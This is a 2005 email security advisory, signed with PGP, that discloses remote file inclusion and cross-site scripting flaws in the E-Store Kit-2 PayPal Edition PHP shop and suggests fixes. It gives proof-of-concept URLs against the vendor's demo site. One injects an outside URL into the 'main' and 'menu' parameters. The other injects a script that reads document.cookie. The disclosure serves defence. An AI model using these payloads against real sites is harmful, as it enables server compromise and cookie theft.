This is a multi-part message in MIME format. ------=_NextPart_000_0005_01C531B2.E030A030 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Dcrab 's Security Advisory http://icis.digitalparadox.org/~dcrab http://www.hackerscenter.com/ Severity: High Title: File inclusion and XSS vulnerability in E-Store Kit-2 PayPal Edition Date: March 26, 2005 Summary: There are file include and xss vulnerabilities in E-Store Kit-2 PayPal Edition. Proof of Concept Exploits: http://www.magicscripts.com/demo/ms-pe02/catalog.php?cid=3D0&sid=3D'%22&s= o rtfield=3Dtitle&sortorder=3DASC&pagenumber=3D1&main=3Dhttp://whatismyip.c= om&me nu=3Dhttp://whatismyip.com This results in http://www.whatismyip.com opening up on the server side resulting in possible compromise of the full system and command execution. http://www.magicscripts.com/demo/ms-pe02/downloadform.php?txn_id=3D">alert(document.cookie) This pops the cookie Possible fix: The usage of htmlspeacialchars() and to enable safe mod in php.ini would solve these problems. Author: These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. Lookout for my soon to come out book on Secure coding with php. -----BEGIN PGP SIGNATURE----- Version: PGP 8.1 - not licensed for commercial use: www.pgp.com iQA/AwUBQkSH0iZV5e8av/DUEQLQdgCg+jEoan4i1l2fqBK5LXse0+kUXQ4AoKWZ 1d0vpE05jqm5pVr597Zxu9m2 =3DfGEj -----END PGP SIGNATURE----- ------=_NextPart_000_0005_01C531B2.E030A030 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
-----BEGIN PGP SIGNED = MESSAGE-----
Hash:=20 SHA1
 
Dcrab 's Security Advisory
http://icis.digitalparadox= .org/~dcrab
http://www.hackerscenter.com/<= /FONT>
 
Severity:  High
Title: File = inclusion and=20 XSS vulnerability in E-Store Kit-2 PayPal
Edition
Date: = March =20 26,  2005
 
Summary:
There are file include and = xss=20 vulnerabilities in E-Store Kit-2
PayPal Edition.
 
Proof of Concept Exploits:
 
http://www.magicscripts.com/demo/ms-pe02/catalog.php?c= id=3D0&sid=3D'%22&so
rtfield=3Dtitle&sortorder=3DASC&a= mp;pagenumber=3D1&main=3Dhttp://whatismyip.com&me
nu=3Dhttp://= whatismyip.com
This=20 results in http://www.whatismyip.com=20 opening up on the server
side resulting in possible compromise of the = full=20 system and command
execution.
 
http://www.magicscripts.com/demo/ms-pe02/downloadform.php?txn_id=3D= "><sc
ript>alert(document.cookie)</script>
This = pops the cookie
 
Possible fix: The usage of = htmlspeacialchars() and=20 to enable safe mod
in php.ini would solve these = problems.
 
Author:
These vulnerabilties have = been found and=20 released by Diabolic Crab,
Email:=20 dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free
to = contact me=20 regarding these vulnerabilities. You can find me at,
http://www.hackerscenter.com = or
http://icis.digitalparadox= .org/~dcrab.=20 Lookout for my soon to come
out book on Secure coding with = php.
 
-----BEGIN PGP = SIGNATURE-----
Version: PGP 8.1 -=20 not licensed for commercial use: www.pgp.com
 
iQA/AwUBQkSH0iZV5e8av/DUEQLQdgCg+jEoan4i1l2fqBK5LXse0+kUXQ4AoKWZ=
1d0vpE05jqm5pVr597Zxu9m2
=3DfGEj
-----END=20 PGP SIGNATURE-----
------=_NextPart_000_0005_01C531B2.E030A030--